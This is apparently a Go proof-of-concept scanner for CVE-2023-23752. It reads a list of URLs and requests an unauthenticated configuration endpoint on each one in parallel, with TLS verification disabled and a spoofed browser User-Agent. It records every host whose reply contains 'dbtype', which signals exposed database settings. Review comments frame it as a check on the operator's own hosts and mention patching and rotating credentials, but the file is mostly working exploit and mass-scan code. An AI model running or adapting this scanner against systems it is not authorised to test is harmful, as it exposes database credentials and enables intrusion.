cve-2023-23752-PoC.go
package main
import (
"bufio"
"bytes"
"crypto/tls"
"flag"
"fmt"
"io"
"net/http"
"os"
"runtime/debug"
"strings"
"sync"
"time"
)
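// main reads base URLs from the file named by -l, requests the application
// configuration endpoint associated with CVE-2023-23752 on each one, and
// appends every URL whose response contains the marker "dbtype" to ./out.txt.
//
// The check is meant for confirming exposure on hosts the operator is
// responsible for. A positive result means the endpoint answered without
// authentication; the remedy is to update the affected installation to a
// release that fixes CVE-2023-23752 and to rotate any credentials the endpoint
// may have disclosed.
func main() {
	// Path appended to every base URL taken from the input file.
	const probePath = "/api/index.php/v1/config/application?public=true"
	// Upper bound on how much of a response is buffered, so that a host
	// returning an unbounded body cannot exhaust memory.
	const maxBodyBytes = 1 << 20

	start := time.Now()
	var wg sync.WaitGroup
	var mutex sync.Mutex

	s := flag.String("l", "AllUrl", "Store the text of the url")
	flag.Parse()

	// The result file lists hosts that look exposed, so it is created
	// owner-only rather than world-writable and executable (was 0777).
	suspicious, err := os.OpenFile("./out.txt", os.O_CREATE|os.O_RDWR|os.O_APPEND, 0600)
	if err != nil {
		fmt.Println("[-]---File creation error", err)
		return
	}
	defer suspicious.Close()
	suspiciousWriter := bufio.NewWriter(suspicious)

	// limitChan caps the number of requests in flight.
	limitChan := make(chan struct{}, 70)

	urls, readErr := readLine(*s)
	if readErr != nil {
		return
	}
	if len(urls) == 0 {
		fmt.Println("[-]---NOT URL")
		return
	}

	// One client is shared by all goroutines; building a transport per
	// request leaves its idle connections behind for the life of the process.
	//
	// NOTE(review): certificate verification is disabled, so the response is
	// not authenticated. Treat a hit as a lead and confirm it over a
	// verified connection before acting on it.
	client := &http.Client{
		Timeout: time.Second * 30,
		Transport: &http.Transport{
			TLSClientConfig:     &tls.Config{InsecureSkipVerify: true},
			MaxIdleConnsPerHost: 150,
		},
	}

	for _, raw := range urls {
		// Blank or whitespace-only lines cannot form a valid request URL.
		base := strings.TrimSpace(raw)
		if base == "" {
			continue
		}

		limitChan <- struct{}{}
		wg.Add(1)
		go func(base string) {
			// Always release the slot and the wait group, including after a
			// panic; the original skipped both on panic, which blocked
			// wg.Wait forever.
			defer wg.Done()
			defer func() { <-limitChan }()
			defer func() {
				if e := recover(); e != nil {
					fmt.Printf("WriteDataToTxt panic: %v,stack: %s\n", e, debug.Stack())
				}
			}()

			target := base + probePath
			req, reqErr := http.NewRequest("GET", target, nil)
			if reqErr != nil {
				fmt.Println("[-]---Request err:", reqErr)
				return
			}
			req.Header.Add("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362")
			req.Header.Add("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9")

			resp, doErr := client.Do(req)
			if doErr != nil {
				fmt.Println("[-]---Client do err:", doErr)
				return
			}
			defer resp.Body.Close()

			// Read straight into the buffer. The original went through a
			// bufio.Writer that was never flushed and only worked because
			// bufio forwards ReadFrom to the underlying buffer.
			var body bytes.Buffer
			if _, copyErr := io.Copy(&body, io.LimitReader(resp.Body, maxBodyBytes)); copyErr != nil {
				fmt.Println("[-]---Read content error", copyErr)
				return
			}

			// NOTE(review): a bare substring match is a heuristic; the status
			// code and content type are not checked, so any page containing
			// "dbtype" is reported. Verify hits manually.
			if !bytes.Contains(body.Bytes(), []byte("dbtype")) {
				fmt.Println("[-]---There is no vulnerability:", target)
				return
			}
			fmt.Println("[+]---There is loophole.:", target)

			// Unlock before handling the error; the original returned while
			// still holding the mutex, deadlocking every later writer.
			mutex.Lock()
			_, writeErr := suspiciousWriter.WriteString(target + "\n")
			mutex.Unlock()
			if writeErr != nil {
				fmt.Println("[-]---storage error:", writeErr)
			}
		}(base)
	}
	wg.Wait()

	fmt.Println("[+]---Save the result...")
	if flushErr := suspiciousWriter.Flush(); flushErr != nil {
		fmt.Println("[-]---storage error", flushErr)
		return
	}
	elapsed := time.Since(start)
	fmt.Println("[+]---elapsed time:", elapsed)
	fmt.Println("by https://github.com/GhostToKnow/CVE-2023-23752")
}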
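// readLine returns the lines of the file at location with their terminators
// ("\n" or "\r\n") removed. Blank lines are kept as empty strings, and a final
// line without a trailing newline is included.
//
// Errors from opening or reading the file are printed and returned. The
// original loop only stopped on io.EOF, so any other read error made it spin
// forever appending empty strings; it also ignored ReadLine's isPrefix flag,
// which split lines longer than the reader's buffer into fragments.
func readLine(location string) ([]string, error) {
	file, err := os.Open(location)
	if err != nil {
		fmt.Println("[-]---File reading error", err)
		return nil, err
	}
	defer file.Close()

	re := bufio.NewReader(file)
	var data []string
	for {
		// ReadString grows as needed, so a long line comes back whole.
		line, readErr := re.ReadString('\n')
		switch {
		case strings.HasSuffix(line, "\n"):
			line = strings.TrimSuffix(strings.TrimSuffix(line, "\n"), "\r")
			data = append(data, line)
		case line != "":
			// Last line of a file that does not end in a newline.
			data = append(data, line)
		}
		if readErr == io.EOF {
			return data, nil
		}
		if readErr != nil {
			fmt.Println("[-]---File reading error", readErr)
			return nil, readErr
		}
	}
}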